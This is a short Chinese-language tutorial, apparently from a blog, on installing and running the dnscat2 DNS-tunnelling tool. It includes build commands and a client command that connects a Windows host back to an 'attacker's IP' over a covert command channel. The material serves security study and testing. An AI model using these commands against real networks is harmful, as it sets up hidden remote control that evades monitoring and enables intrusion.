安装

  • 服务端
 git clone https://github.com/iagox86/dnscat2.git
 cd dnscat2
 cd server
 sudo gem install bundler
 bundle install
  • 客户端
 git clone https://github.com/iagox86/dnscat2.git
 cd dnscat2/client/
 make

*** 服务端和客户端均有编译好的 ***

运行

直连

  • 服务端
ruby ./dnscat2.rb --dns "domain=localhost,host=127.0.0.1,port=53" --no-cache

DNS隧道--dnscat2

  • 客户端
dnscat2-v0.07-client-win32.exe --dns server=攻击者的IP --secret=攻击者服务器生成的ID

DNS隧道--dnscat2

DNS

  • 服务端

  • 客户端


相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2022-02-12
  • 2022-12-23
  • 2021-10-24
  • 2022-02-10
  • 2021-11-20
  • 2022-12-23
猜你喜欢
  • 2022-12-23
  • 2021-09-10
  • 2021-06-19
  • 2021-06-12
  • 2021-11-01
  • 2021-10-08
  • 2021-12-28
相关资源
相似解决方案